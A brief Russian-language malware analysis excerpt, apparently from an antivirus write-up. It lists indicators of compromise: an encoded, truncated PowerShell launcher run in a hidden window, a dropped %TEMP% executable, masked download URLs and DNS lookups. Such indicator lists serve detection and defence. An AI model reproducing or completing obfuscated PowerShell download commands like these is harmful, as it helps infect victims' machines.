Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAE4AVwBUAFMAZQB2AGoAPQAnAEsASgBCAFkATwBvAGoAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AHIAaQB0AGAAeQBwAGAAUgBgAE8AdABvAEMATwBMACIAIAA9AC...
- %TEMP%\wmzy.exe
- %TEMP%\wmzy.exe
- http://gr###mmerth.com/stats/rBZp0wy31512967/
- http://ri###utra.com/img/yiZS/
- DNS ASK gr###mmerth.com
- DNS ASK pa###ink.com.br
- DNS ASK ri###utra.com
- DNS ASK mr##ggy.com
- DNS ASK my#####health.online
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAE4AVwBUAFMAZQB2AGoAPQAnAEsASgBCAFkATwBvAGoAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwB1AHIAaQB0AGAAeQBwAGAAUgBgAE8AdABvAEMATwBMACIAIAA9AC...' (со скрытым окном)